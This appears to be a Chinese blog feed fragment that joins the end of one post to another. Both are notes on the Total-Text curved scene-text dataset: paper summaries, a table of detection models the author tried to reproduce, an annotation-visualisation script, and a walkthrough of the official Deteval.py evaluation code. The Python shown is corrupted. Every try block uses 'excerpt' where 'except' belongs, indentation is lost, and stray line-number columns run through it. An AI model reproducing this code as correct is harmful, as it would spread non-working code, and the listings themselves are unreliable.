    local_precision = local_accumulative_precision / num_det
    excerpt ZeroDivisionError:
    local_precision = 0

    try:
    local_recall = local_accumulative_recall / num_gt
    excerpt ZeroDivisionError:
    local_recall = 0

    temp = ('%s______/Precision:_%s_______/Recall:_%s\n' % (allInputs[idx], str(local_precision), str(local_recall)))
    fid.write(temp)
    fid.close()
    try:
    recall = global_accumulative_recall / total_num_gt
    excerpt ZeroDivisionError:
    recall = 0

    try:
    precision = global_accumulative_precision / total_num_det
    excerpt ZeroDivisionError:
    precision = 0

    try:
    f_score = 2*precision*recall/(precision+recall)
    excerpt ZeroDivisionError:
    f_score = 0

    fid = open(fid_path, 'a')
    temp = ('Precision:_%s_______/Recall:_%s\n' %(str(precision), str(recall)))
    fid.write(temp)
    fid.close()
    print(temp)

    这段代码是一个循环,循环遍历 global_sigma 列表中的每个元素。

    在每次循环中,首先打印 allInputs[idx] 的值,然后将 global_sigma[idx] 赋值给 local_sigma_table,将 global_tau[idx] 赋值给 local_tau_table

    接下来,计算 local_sigma_table 的形状,并将结果分别赋值给 num_gtnum_det

    然后,将 num_gtnum_det 加到累计变量 total_num_gttotal_num_det 上。

    接着,初始化一些变量,包括 local_accumulative_recalllocal_accumulative_precisiongt_flagdet_flag

    然后,依次调用 one_to_oneone_to_manymany_to_one 函数,对 local_sigma_tablelocal_tau_table 进行匹配计算,并更新相关计数变量和标志位。

    接下来,打开一个文件,并将 local_accumulative_precisionlocal_precision 计算结果写入文件。

    Pascal VOC

    ​ 传统的 $0.5$ 阈值。


    ​ 提供了两种语言:Matlab 和 Python,只有 Matlab 的有示例……Python 的没有,绝

    png

    Groundtruth

    ​ 可提供的 GT:

    • Pixel 级

      • Character Level Mask

        • The pixel level groundtruth of Total-Text dataset can be downloaded at this https URL (80Mb).

        gif

      • Text Region Mask

        • The text region mask groundtruth of Total-Text dataset can be downloaded at this https URL (6Mb).

        gif

    • Text 级

      png

    计划(寄)

    ​ 复现一下 Total-Text Benchmark (Scene Text Detection) | Papers With Codecs-chan/Total-Text-Dataset: Total Text Dataset. It consists of 1555 images with more than 3 different text orientations: Horizontal, Multi-Oriented, and Curved, one of a kind. (github.com) 里的代码。

    ​ 真是太难复现了我日。

    ​ 尝试过的/打算尝试的:

    ModelF-MeasurePrecisionRecallPaperGitHub备注
    CentripetalText87.85%90.6785.19CentripetalText: An Efficient Text Instance Representation for Scene Text Detection Papers With Codeshengtao96/CentripetalText (github.com)默认的 Total-Text 形式
    FCE89.382.585.8GXYM/TextBPN-Plus-Plus: Arbitrary Shape Text Detection via Boundary Transformer;The paper at: https://arxiv.org/abs/2205.05320, which has been accepted by IEEE Transactions on Multimedia (T-MM 2023). (github.com)GXYM/TextBPN-Plus-Plus: Arbitrary Shape Text Detection via Boundary Transformer;The paper at: https://arxiv.org/abs/2205.05320, which has been accepted by IEEE Transactions on Multimedia (T-MM 2023). (github.com)默认的 Total-Text 形式
    DPText-DETR
    (ResNet-50)
    87.3%82.193.1[2211.10772] DeepSolo: Let Transformer Decoder with Explicit Points Solo for Text Spotting (arxiv.org)[ViTAE-Transformer/DeepSolo: The official repo for CVPR’23] “DeepSolo: Let Transformer Decoder with Explicit Points Solo for Text Spotting” & [ArXiv’23] “DeepSolo++: Let Transformer Decoder with Explicit Points Solo for Text Spotting” (github.com)Total-Text 的形式不同于默认形式(复杂的 json 文件)
    FAST-B-80087.5%90.085.2[2111.02394v2] FAST: Faster Arbitrarily-Shaped Text Detector with Minimalist Kernel Representation (arxiv.org)czczup/FAST: Faster Arbitrarily-Shaped Text Detector with Minimalist Kernel Representation (github.com)sh ./compile.sh 编译失败,寄!
    TextFuseNet
    (ResNeXt-101)
    87.5%89.285.8TextFuseNet: Scene Text Detection with Richer Fused Features Papers With Codeying09/TextFuseNet: A PyTorch implementation of “TextFuseNet: Scene Text Detection with Richer Fused Features”. (github.com)
    I3CL + SSL
    (ResNet-50)
    86.9%89.884.2I3CL + SSL
    (ResNet-50)
    ViTAE-Transformer/I3CL: The official repo for [IJCV’22] “I3CL: Intra- and Inter-Instance Collaborative Learning for Arbitrary-shaped Scene Text Detection” (github.com)仓库里好像没有适配 Total-Text 的
    CharNet H-88 (multi-scale)86.5%8885Convolutional Character Networks Papers With Codemsight-tech/research-charnet: CharNet: Convolutional Character Networks (github.com)仓库里好像没有适配 Total-Text 的,只有 ICDAR2015
    DBNet++
    (ResNet-50)
    86%88.983.2Real-Time Scene Text Detection with Differentiable Binarization and Adaptive Scale Fusion Papers With CodeMhLiao/DB: A PyTorch implementation of “Real-time Scene Text Detection with Differentiable Binarization”. (github.com)Total-Text 的形式不同于默认形式(较易懂的 txt 形式)
    PAN-64085%89.381Efficient and Accurate Arbitrary-Shaped Text Detection with Pixel Aggregation Network Papers With CodeWenmuZhou/PAN.pytorch: A unofficial pytorch implementation of PAN(PSENet2): Efficient and Accurate Arbitrary-Shaped Text Detection with Pixel Aggregation Network (github.com)仓库里好像没有适配 Total-Text 的,只有 ICDAR2015
    DB-ResNet-50 (800)84.7%Real-time Scene Text Detection with Differentiable Binarization Papers With CodeMhLiao/DB: A PyTorch implementation of “Real-time Scene Text Detection with Differentiable Binarization”. (github.com)Total-Text 的形式不同于默认形式(较易懂的 txt 形式)
    CRAFT83.6%87.679.9Character Region Awareness for Text Detection Papers With Codeclovaai/CRAFT-pytorch: Official implementation of Character Region Awareness for Text Detection (CRAFT) (github.com)仓库里好像没有适配 Total-Text 的
    TextSnake78.4%82.774.5TextSnake: A Flexible Representation for Detecting Text of Arbitrary Shapes Papers With Codeprincewang1994/TextSnake.pytorch: A PyTorch implementation of ECCV2018 Paper: TextSnake: A Flexible Representation for Detecting Text of Arbitrary Shapes (github.com)Total-Text 的形式不同于默认形式

    可视化数据集

    ​ 根据数据集的源图像以及它的 txt 标注格式,再一阵 ChatGPT 和一阵操作,写一个可视化代码:

    import cv2
    import os
    import matplotlib.pyplot as plt
    import numpy as np

    index = 396

    image_dir = r'E:\dataset\TotalText\Images\Test\\'
    label_dir = r'E:\dataset\TotalText\GroundTruth\Text\Test\\'

    image_path = os.path.join(image_dir, 'img' + str(index) + '.jpg')
    label_path = os.path.join(label_dir, 'poly_gt_img' + str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
    x = [int(num) for num in annotation[annotation.find("x: [[") + 5: annotation.find("]], y: [[")].split()]
    y = [int(num) for num in annotation[annotation.find("y: [[") + 5: annotation.find("]], ornt: [")].split()]
    ornt = annotation[annotation.find("ornt: [u'") + 9: annotation.find("'], transcriptions: [")]
    transcriptions = annotation[annotation.find("transcriptions: [u'") + 19: -3]

    points = np.array([x, y], np.int32).T

    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, ornt, (x[0], y[0] + int(min(height, width) / 50)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (255, 0, 255), int(min(height, width) / 500))
    cv2.putText(image, transcriptions, (x[0], y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()

    png

    ]]>
    + 资源

    包含两个任务:

    Total-Text: A Comprehensive Dataset for Scene Text Detection and Recognition

    Abstract

    弯曲文本在常见的文本数据集中(ICDAR’13MSRA-TD500)几乎不存在,TotalText 数据集则有。最近,一种将文本检测作为分割问题的新解决方案已经证明了它们对多方向文本的有效性。

    1 INTRODUCTION

    ​ 市面上几乎没有弯曲文本的数据集,CUTE80 是唯一可用的,然而它只有 80 张,不好使。

    ​ 如果没有合适的数据集,解决弯曲文本检测问题的努力就很少出现。

    Total Text

    • 一个考虑到弯曲文本的场景文本数据集,填补了场景文本数据集中文本方向的空白
    • 1555 幅场景图像,4265 个文本实例,9330 个注释单词
    • 三种不同的文本方向,包括水平 horizontal多向 multi-oriented弯曲 curved

    png

    第一行是分别是 ICDAR 2013,ICDAR 2015 和 MSRA-TD500(几乎没有弯曲文本)
    第二行是 Total-Text,具有弯曲文本

    png

    现有的 Text Detection 对弯曲文本都不好使

    A. Scene Text Datasets

    • ICDARs 系列,几百到几千张图像数量不等,文本质量模糊。

    • MSRA-TD500 于 2012 年推出,旨在解决场景文本数据集中缺乏任意定向文本的问题。它有 300 个训练图像和 200 个测试图像;用最小面积矩形标注。

    • COCO-Text 于 2016 年推出,数据量大(63686 张图像和 173589 个文本标记区域),也包含水平 horizontal、多向 multi-oriented 和弯曲 curved,然而它的 Ground Truth 只有 bbox,这只对水平和垂直文本有效。

    • CUTE80 只有 80 张,数据量太小了。

    B. Scene Text Detection

    ​ 介绍各种 Scene Text Detection 的模型,略。

    3 TOTAL-TEXT DATASET

    A. Dataset Attributes

    • 弯曲文本是一个被忽视的问题 Curved text is an overlooked problem 在水平文本 ICDAR 中,性能几乎已达饱和(f-score 达到 0.9)

    • 弯曲文本观察 Curved text observation 从几何角度讲,直线沿着直线没有角度变化,因此可以描述为线性函数,y=mx+c。而曲线不是直线。它在整个线路上不受角度变化的限制。

    • **方向假设 Orientation assumption ** 目前很多 Text Detection 模型都具有方向假设,这种方式估计放到弯曲文本就寄了。

    • 以聚焦的场景文本为起点 Focused scene text as a start ICDAR 系列的文本显示质量差,作者认为文本质量稍微好一点更适合启动相关研究工作。

    • GT 越完备越好 Tighter groundtruth is better ICDAR 2015 使用四边形(四个点),COCO 使用 bbox(两个点)。在 Total Text 中,我们用紧密贴合的多边形对文本区域进行了注释。

    • 评估协议 Evaluation Protocol 与 ICDAR 数据集一样,TotalText 使用 DetEval。

    • 注释详细信息 Annotation Details 仍然保留了 bbox 的注释。Total Text 只考虑自然图像中的英文字符;其他语言、数字水印和无法阅读的文本被贴上了 “do not care” 的标签。

    B. Dataset Statstics

    • 数量优势 Strength in numbers 它总共有 9330 个注释文本,平均每个图像有 6 个实例。Total Text 中超过一半的图像具有 2 个不同的方向及以上,平均每个图像产生 1.8 个方向。数据集的收集也考虑了

    png

    • 方向多样性 Orientation diversity 大约一半的是弯曲的:

      • Horizontal Curve 水平弯曲 57.1%
      • Vertical Curve 垂直弯曲 23.5%
      • Circular 圆形 17.3%
      • Wavy 波浪形 2%

    ​ 弯曲文本通常与水平文本或多方向文本一起出现。图像中方向的混合对文本检测算法在文本方向方面实现鲁棒性和泛化提出了挑战。

    • 场景多样性 Scene diversity 弯曲文本出现的场景多样性好。

    4 SEMANTIC SEGMENTATION FOR TEXT DETECTION 用于文本检测的语义分割

    A. DeconvNet

    ​ 介绍他们提出的 DecovNet。使用最大的场景文本数据集 COCO-text 对其进行了预训练。COCO-text 中的图像被分为可阅读和难以阅读的文本,我们只在可阅读的文本上训练我们的网络,因为它与我们的数据集非常相似。

    B. Experiments

    DatasetRecallPrecisionF-score
    Total-Text0.330.400.36

    Total-Text: toward orientation robustness in scene text detection

    Abstract

    ​ 目前场景文本数据集中的文本方向还不够多样化。

    ​ 提出的 Total-Text 具有三种不同的文本方向:

    • 水平 horizontal
    • 多方向 multi-oriented
    • 曲线方向 curve-oriented

    ​ 研究了其他几个重要因素:

    • ground truth 的 practicality(实用性)和 quality(质量)
    • evaluation protocol 评估协议
    • annotation process 注释过程

    ​ 提出了一个新的场景文本检测模型作为 Total text 基线,称为 Polygon-Faster-RCNN

    1 Introduction

    png

    Total Text 的注释详细信息。a 总文本的图像,b 文本区域二进制掩码,c 字符级二进制掩码,d 固定长度多边形顶点,转录(区分大小写)和方向注释('c':弯曲,'m':多方向)

    ​ 提出的 Total-Text 包含:

    • 1555 幅场景图像,11459 个注释单词
    • GT 包括:
      • spatial location 空间位置
      • transcription 标注
      • pixel level for text detection, recognition and segmentation task 像素级的用于文本检测、识别和分割任务

    ​ 提出了新的场景文本模型:Polygon Faster RCNN(Poly FRCNN)。用于回归多边形而不是长方体参数。它能够检测所有方向的文本,并以精确的方式将其绑定。我们提出的模型在 ICDAR2013、ICDAR2015 和 Total Text 上的 F 测度分别达到 0.85、0.72 和 0.7;证明了其在具有不同属性的数据集上的有效性。

    1.1 Improved ground truth

    ​ 多边形顶点的数量因文本实例的不同而不同。这给 Faster RCNN、SSD 和 YOLO 等检测框架带来了一个实际问题(所有这些都激发了许多场景文本检测工作),它们需要在回归目标中有固定数量的顶点。

    1.2 Optimized evaluation protocol for Total-Text

    ​ DetEval 中当前推荐的阈值没有通过包含弯曲文本进行优化。进行了一系列实验,以确定一组新的更公平评估阈值。

    1.3 Scene text detection annotation tool

    ​ 在扩展数据集时,地面实况注释是最大的瓶颈。Karatzas 等人介绍了一个注重质量控制和数据库管理的在线注释平台。然而,仅仅是平凡而艰苦的注释任务就有很大的改进空间。因此,我们在第节中介绍了全文工具(T3)。5、一种辅助注释框架,该辅助注释框架能够减少注释时间,同时获得高质量的基本事实。

    1.4 Cross dataset experiment

    ​ 在 Total Text 上训练的模型在其他场景文本数据集上表现出良好的泛化能力

    1.5 State-of-the-art analysis

    ​ 自 TotalText 出现以来,许多工作开始解决弯曲文本检测问题。

    2.1 Scene text datasets

    2.1.1 ICDAR2003-ICDAR2015

    系列数量注释特性
    2003509bbox
    2011484bbox
    2013462bbox
    20151670四边形包含任意方向,失焦

    2.1.2 MSRA-TD500

    ​ 2012,包含任意定向文本,300 训练图像,200 测试图像,使用旋转的边界框进行注释。

    2.1.3 USTB-SV1K

    ​ 从美国六个城市的街道上收集了 1000 张图像,以多方向文本为特色,用旋转的边界框进行注释。

    2.1.4 COCO-text

    ​ 2016,迄今为止最大的场景文本数据集,拥有 63686 幅图像和 173589 个标记文本区域。它主要由横向和多向文本以及少量弯曲文本组成,bbox。

    2.1.5 MLT

    ​ MLT 数据集,这是为场景文本检测、识别和脚本识别任务收集的最新多脚本数据集之一。它由 18000 个图像组成,用于训练和验证,以 9 种语言和 6 种不同的脚本为特色。

    2.1.6 CTW-12k

    ​ 2017,12000 多张,中英文。

    2.1.7 MTWI

    ​ 迄今为止最大的多语言数据集之一,拥有 20000 张图像。

    2.1.8 SynthText

    ​ 包含 80 万个场景文本图像。它的注释由单词级和字符级轴对齐的边界框及其转录组成。它的缺点是,它使用了与 COCO 文本类似的轴对齐的边界框,这不适合多方向的文本。

    2.1.9 CUTE80

    ​ 第一个突出弯曲文本的场景文本数据集,可惜只有 80 张。

    2.1.10 CTW1500

    ​ 原则上是最接近 Total Text 的数据集。Total Text 的文本实例在单词级别进行注释,而 CTW1500 的文本实例则在行级别进行注释。

    2.2 Scene text detection

    2.2.1 Scene text inspired handcrafted feature era

    ​ 场景文本的手工特征时代。

    2.2.2 The emergence of CNN

    ​ CNN 的出现。

    2.2.3 Segmentation-based scene text detection

    ​ 基于分割的场景文本检测。

    2.2.4 Proposal-based scene text detection

    ​ 基于提示的场景文本检测。

    2.2.5 Single network scene text detection

    ​ 单网络场景文本检测。

    2.2.6 Curved text detection

    ​ 曲线文本检测。

    3 The Total-Text dataset

    3.1 Dataset attributes

    3.1.1 Curved text is an overlooked problem

    ​ 水平文本的检测性能几乎达到饱和(F-score 为 0.9),但是缺乏弯曲文本。

    3.1.2 Curved text observation

    ​ 曲线不是直线。它在整个线路上不受角度变化的限制。

    3.1.3 Detection ground truth annotation

    ​ Total Text 中的文本实例是以单词级别的粒度进行注释的。

    3.1.4 Recognition ground truth annotation

    ​ 提供了单词 recognition 挑战的 GT。

    3.1.5 Segmentation ground truth annotation

    ​ 像素级的 GT 标注是最耗时的过程,我们提供了多种预处理方案。

    png

    像素级注释过程。a 输入图像补丁。bc 调整颜色阈值,使文本与背景区域分离。d–f 删除“非文本”区域。g 最终结果

    3.1.6 Orientation annotation

    具体来说,注释是这样表示的:

    • ‘h’ 表示水平文本
    • ‘m’ 表示多向文本
    • ‘c’ 表示弯曲文本

    3.1.7 Regulated polygon ground truth

    ​ 在本文中,我们使用以下方案对全文注释进行了改进。除了将多边形顶点的数量设置为 10(根据经验,10 个顶点足以紧密覆盖我们数据集中的所有单词级文本实例)

    ​ 新的多边形地面实况注释步骤如图 7 所示。首先,需要人工注释器手动选择四个不同的顶点,作为单词实例的开始和结束顶点。单词“MARLEY”(红点和绿点)上角的两个顶点将用于生成三条等距的黄色引导线。生成引导线的算法在算法 1 中进行了说明。然后,人类注释者将沿着每条黄色引导线选择一个截取点(表示为“*”),该点最能绑定单词的顶部边界。


    算法 1 在调节多边形注释过程中生成引导线的算法,emmmm 就是给个上界和下界生成三等分的点,这样文字的四个角和三条三等分的线就可以形成 10 个顶点。

    png


    3.2 Dataset statistics

    3.2.1 Strength in numbers

    ​ Total Text 分为两组:训练集和测试集,分别有 1255 张和 300 张图像。图 10 显示了 Total Text 的一系列统计信息。它总共有 11459 个带注释的文本实例,平均每个图像有7.37个实例。Total Text 中超过一半的图像具有两个不同的方向及以上,平均每个图像产生1.8个方向。

    ​ 数据集的收集也考虑到了质量,包括场景复杂性。例如类似文本和低对比度背景,不同的字体类型和大小。

    3.2.2 Orientation diversity

    ​ 大约一半的文本实例是弯曲的,另一半在水平和多向之间几乎相等地划分。尽管所有图像都是在考虑弯曲文本的情况下收集的,但其他方向仍然占据了总实例的一半。仔细观察 Total Text 可以发现,弯曲文本通常与水平文本或多方向文本一起出现。图像中文本方向的混合对文本检测算法在文本方向方面实现鲁棒性和泛化提出了挑战。

    3.2.3 Scenery diversity

    ​ Total Text 图像中的风景也很多样化。

    4 Evaluation protocol

    4.1 DetEval

    ​ Total Text 首次引入 DetEval 评估协议。然而,我们意识到,建议的 tp 和 tr 阈值,分别为 0.4 和 0.8,并没有通过在 Total text 中包含弯曲文本和多边形地面实况进行优化。

    4.2 PASCAL VOC

    ​ 与 CTW1500 和 ICDAR2015 类似,PASCAL VOC 评估方法也适用于 Total Text。

    4.3 Intersection area between polygons

    ​ 预测区域和地面实况区域之间的交集计算是 DetEval 和 Pascal VOC 评估协议的核心。

    5 Scene text detection annotation tool

    ​ 提出了一个注释工具:Total Text tool(T3),能够将注释时间减少 25%,与人类注释者的一致率为 84%。

    5.1 Total-Text-Tool

    5.2 Experiment setup

    5.3 Performance analysis

    6 Polygon-faster-RCNN

    6.1 Text line encoding method

    ​ Faster RCNN、SSD和YOLO中使用的传统回归目标 $(x_m,y_m,w,h)$ 只能用于轴对称矩形框,而不能用于多边形。

    6.1.1 Variants of Poly-FRCNN

    ​ Poly-FRCNN-5 是 3 的放大版,它在回归头中又有 10 个参数

    6.1.2 Encode

    6.1.3 Decode

    6.2 Anchor polygons parameterization

    6.3 Implementation details

    6.3.1 Feature extractor

    ​ 模型采用 Inception-Resnet-V2 作为特征提取器。

    6.3.2 Anchor boxes

    6.3.3 Loss function

    6.3.4 Training

    ​ 所有的 models 都经过了相同的训练计划。

    • 它们首先使用 ImageNet pre-trained 的权重进行初始化。

    • 然后,训练计划从 SynthText 上的 100 K 次迭代开始,然后是来自 COCO Text 的真实世界数据上的另外 100 K 次重复。最后,我们使用目标训练集对它们进行了 fine tune,以进行另外 50 K 次迭代。

    ​ 该训练计划中最大数据集(SynthText)的初始学习率设置为0.003,然后自COCO Text训练开始以来降低了0.0003,并在其余训练中保持不变。

    ​ 来自 SynthText100K 图像被随机选择用于训练的第一阶段。

    ​ 然后,在第二训练阶段期间使用来自具有至少一个可阅读文本实例的 COCO-Text 的大约 13K 个训练图像。

    ​ 最后,来自总文本训练集的 1255 幅图像被用于 fine-tuning 阶段。

    6.3.5 Testing

    ​ 这个过程尽可能简单。除了标准的非最大值抑制(NMS)外,没有使用后处理或多尺度。

    6.4 Evaluation

    6.4.1 Dataset

    ​ 我们评估了 Poly FRCNN 在 ICDAR2013、ICDAR2015 和 Total Text 上的性能。选择 ICDAR2013 和 ICDAR2015 分别演示了 PolyFRCNN 在水平文本和多方向文本上的性能。

    6.4.2 Evaluation Protocol

    ​ 使用 DetEval 方案中的建议(即 $tp=0.4$ 和 $tr=0.8$)对 ICDAR2013 报告的性能进行评估,以便与现有技术的解决方案进行公平比较。对于 Total-Text ,我们使用了 $tp=0.6$ 和 $tr=0.7$,同时,对 ICDAR2015 和 Total Text 的结果使用了 Pascal VOC 评估方法的标准$0.5\mathrm{IoU}$ 阈值。

    6.4.3 Performance analysis

    6.4.4 Box-FRCNN versus Poly-FRCNN-3

    6.4.5 Poly-Baseline versus Poly-FRCNN-3

    6.4.6 Poly-FRCNN-5

    6.4.7 Inference time

    6.4.8 Performance on other curved text datasets

    ​ 除了Total Text,我们还在其他曲线文本数据集 CUTE-80 和 CTW1500 上评估了我们提出的模型。Poly-FRCNN-3 在上述数据集上的 F-Score 分别达到 0.65 和 0.72(表5)。请注意,CUTE80 中的注释粒度不一致(即单词级别和行级别的混合),因此我们在评估之前将它们重新标记。

    6.5 Cross datasets experiment

    png

    6.5.1 Pretraining on SynthText and COCO-Text only

    ​ 仅在 SynthText 和 COCO Text 上训练的模型(表 6 中的第一行)通常比在相应数据集上进行微调的其他模型表现更差。尽管该模型的性能在 ICDAR2013 和 ICDAR2015 上仍然具有竞争力,即使没有对其进行微调;它在 Total Text 上的性能最差,与性能最好的模型(第四排)相比,在 F-Score 方面有 0.24 的大差距。

    6.5.2 Fine-tuning on ICDAR2013 and ICDAR2015

    ​ ICDAR2013 主要由水平文本组成,并使用轴对称框作为基本事实,因此,对其进行微调无助于提高其在 Total text 上的性能也就不足为奇了

    6.5.3 Fine-tuning on Total-Text

    ​ 虽然该模型仅在 Total-Text 上进行了微调,但在其他两个数据集上取得了良好的结果,这表明 Total Text 的数据足够多样化,可以用于模型的泛化。

    6.6 State-of-the-art analysis

    ​ 其他工作balabala……

    7 Conclusion

    仓库

    ​ 从 GitHub cs-chan/Total-Text-Dataset: Total Text Dataset. It consists of 1555 images with more than 3 different text orientations: Horizontal, Multi-Oriented, and Curved, one of a kind. (github.com) 里下载代码:

    png

    Annotation_tools

    png

    ​ 他们提供的一个标注工具,看样子使用 Objective-C 写的。

    ​ Total-Text-Tool (T3) is a guided annotation framework that is designed to reduce annotation time. In our experiment, T3 reduces annotation time by 25%. For more details of T3 and all related experiments, please refer to our IJDAR journal publication.

    ​ We make all three variants of T3 available.

    1. T3_v1 - the baseline version, the suggestion mechanism is not incorporated. 不带提示,完全手工
    2. T3_v2 - the suggestion mechanism is incorporated, only suggest rectangle bounding box, polygon is not suggested. 只支持 bbox
    3. T3_v3 - suggests both rectangle and polygon bounding box. 最后可以生成 bbox 和 多边形

    ​ Kindly refer to ‘T3_use_cases’ for different use cases of T3_v3.

    Baseline

    ​ 有两个模型:

    • Polygon-Faster-RCNN-3 (P3)
    • Polygon-Faster-RCNN-5 (P5)

    ​ 要预训练模型啊……好像搞不到

    Dataset

    ​ The Total-Text dataset can be downloaded at this https URL (size = 441Mb).

    Evaluation_Protocol

    ​ 这些代码是 Total Text 的官方评估协议实现。提供了两种方法:Deteval 和 Pascal VOC 协议。

    Deteval

    ​ 我们建议 $tr=0.7$ 和 $tp=0.6$ 阈值,以便使用多边形地面实况和检测格式进行更公平的评估。

    Deteval.py 代码解析:

    • 定义
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    from os import listdir
    from scipy import io
    import numpy as np
    # mask counting version
    # from polygon_wrapper import iod
    # from polygon_wrapper import area_of_intersection
    # from polygon_wrapper import area

    # polygon based version
    from polygon_fast import iod
    from polygon_fast import area_of_intersection
    from polygon_fast import area
    from tqdm import tqdm

    try: # python2
    range = xrange
    excerpt excerption:
    # python3
    range = range

    """
    Input format: y0,x0, ..... yn,xn. Each detection is separated by the end of line token ('\n')'
    """

    input_dir = '../Examples/Prediction/' #detection directory goes here
    gt_dir = '../Examples/Groundtruth/' #gt directory goes here
    fid_path = '../Examples/' #output text file directory goes here

    allInputs = listdir(input_dir)
    • def input_reading_mod()
    1
    2
    3
    4
    5
    6
    def input_reading_mod(input_dir, input):
    """This helper reads input from txt files"""
    with open('%s/%s' % (input_dir, input), 'r', encoding='latin-1') as input_fid:
    pred = input_fid.readlines()
    det = [x.strip('\n') for x in pred]
    return det

    这是一个名为 input_reading_mod 的函数定义,它用于从文本文件中读取输入。

    函数的输入参数包括 input_dir input,分别表示输入目录和要读取的文件名。

    函数的功能是打开指定路径下的文本文件,并按照每行的格式读取文件内容。使用open函数打开文件时,通过 '%s/%s' % (input_dir, input) 的方式构建了文件的完整路径,并且指定了使用 'r' 模式以只读方式打开文件。encoding='latin-1' 参数指定了文件的编码格式为 Latin-1。

    接着,使用 readlines 方法将文件内容按行读取,并将结果存储在 pred 列表中。然后,使用列表推导式 [x.strip('\n') for x in pred] 去掉每行末尾的换行符,得到处理后的数据列表 det

    最后,函数返回 det 列表作为输出结果。

    • gt_reading_mod()
    1
    2
    3
    4
    5
    6
    def gt_reading_mod(gt_dir, gt_id):
    """This helper reads groundtruths from mat files"""
    gt_id = gt_id.split('.')[0]
    gt = io.loadmat('%s/poly_gt_%s.mat' % (gt_dir, gt_id))
    gt = gt['polygt']
    return gt

    这是一个名为 gt_reading_mod 的函数定义,它用于从 .mat 文件中读取标注数据。

    函数的输入参数包括 gt_dirgt_id,分别表示标注目录和要读取的文件名。

    函数的功能是首先对 gt_id 进行字符串处理,通过 .split('.')[0] 将文件名中的扩展名去除。

    然后,使用 io.loadmat 函数读取指定路径下的 .mat 文件,该文件的完整路径由'%s/poly_gt_%s.mat' % (gt_dir, gt_id)构建而成。loadmat函数将.mat文件中的数据读入到一个字典类型的变量gt中。

    接着,从字典中获取名为polygt的键值对应的数据,并将其存储在变量gt中。

    最后,函数返回gt作为输出结果。

    • detection_filtering()
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    def detection_filtering(detections, groundtruths, threshold=0.5):
    for gt_id, gt in enumerate(groundtruths):
    if (gt[5] == '#') and (gt[1].shape[1] > 1):
    gt_x = list(map(int, np.squeeze(gt[1])))
    gt_y = list(map(int, np.squeeze(gt[3])))
    for det_id, detection in enumerate(detections):
    detection = detection.split(',')
    detection = list(map(int, detection))
    det_y = detection[0::2]
    det_x = detection[1::2]
    det_gt_iou = iod(det_x, det_y, gt_x, gt_y)
    if det_gt_iou > threshold:
    detections[det_id] = []

    detections[:] = [item for item in detections if item != []]
    return detections

    这是一个名为 detection_filtering 的函数定义,用于过滤掉与标注数据重叠度低的检测结果。

    函数的输入参数包括 detectionsgroundtruths,分别表示检测结果和标注数据。另外还有一个可选参数 threshold,表示重叠度的阈值,默认为 0.5。

    函数的功能是遍历所有的标注数据,对于每个标注数据,判断其是否为文字区域(gt[5] == '#')并且有多个顶点(gt[1].shape[1] > 1)。如果满足这两个条件,则将标注数据的顶点信息提取出来,分别存储在 gt_xgt_y 列表中。

    然后,遍历所有的检测结果,对于每个检测结果,先将其按逗号分隔,并将得到的字符串列表转换为整数列表。再根据坐标的奇偶性,将检测结果的 x 坐标和 y 坐标分别存储在 det_xdet_y 列表中。

    接下来,使用 iod 函数计算检测结果与标注数据之间的重叠度(Intersection over Detection)。如果重叠度大于设定的阈值,则将该检测结果从 detections 列表中移除,即将其置为空列表 []

    最后,使用列表推导式 [item for item in detections if item != []] 将不为空的检测结果重新存储到 detections 列表中。

    函数返回经过过滤后的 detections 列表作为输出结果。

    • sigma_calculation()
    1
    2
    3
    4
    5
    6
    def sigma_calculation(det_x, det_y, gt_x, gt_y):
    """
    sigma = inter_area / gt_area
    """
    # print(area_of_intersection(det_x, det_y, gt_x, gt_y))
    return np.round((area_of_intersection(det_x, det_y, gt_x, gt_y) / area(gt_x, gt_y)), 2)

    这是一个名为 sigma_calculation 的函数定义,用于计算检测结果与标注数据之间的重叠度。

    函数的输入参数包括 det_xdet_ygt_xgt_y,分别表示检测结果和标注数据的顶点坐标。

    函数的功能是根据以下公式计算重叠度(sigma):

    1
    sigma = inter_area / gt_area

    其中,inter_area 表示检测结果与标注数据之间的交集区域面积,gt_area 表示标注数据的区域面积。

    函数内部通过调用两个辅助函数 area_of_intersectionarea 来计算交集区域面积和标注数据区域面积。然后将交集区域面积除以标注数据区域面积,并使用 np.round 函数将结果四舍五入到小数点后两位。

    最后,函数返回计算得到的重叠度作为输出结果。

    • tau_calculation()
    1
    2
    3
    4
    5
    def tau_calculation(det_x, det_y, gt_x, gt_y):
    """
    tau = inter_area / det_area
    """
    return np.round((area_of_intersection(det_x, det_y, gt_x, gt_y) / area(det_x, det_y)), 2)

    这是一个名为 tau_calculation 的函数定义,用于计算检测结果与标注数据之间的重叠度。

    函数的输入参数包括 det_xdet_ygt_xgt_y,分别表示检测结果和标注数据的顶点坐标。

    函数的功能是根据以下公式计算重叠度(tau):

    1
    tau = inter_area / det_area

    其中,inter_area 表示检测结果与标注数据之间的交集区域面积,det_area 表示检测结果的区域面积。

    函数内部通过调用两个辅助函数 area_of_intersectionarea 来计算交集区域面积和检测结果区域面积。然后将交集区域面积除以检测结果区域面积,并使用 np.round 函数将结果四舍五入到小数点后两位。

    最后,函数返回计算得到的重叠度作为输出结果。

    • 变量定义
    1
    2
    3
    4
    5
    6
    7
    8
    9
    global_tp = 0
    global_fp = 0
    global_fn = 0
    global_sigma = []
    global_tau = []
    tr = 0.7
    tp = 0.6
    fsc_k = 0.8
    k = 2

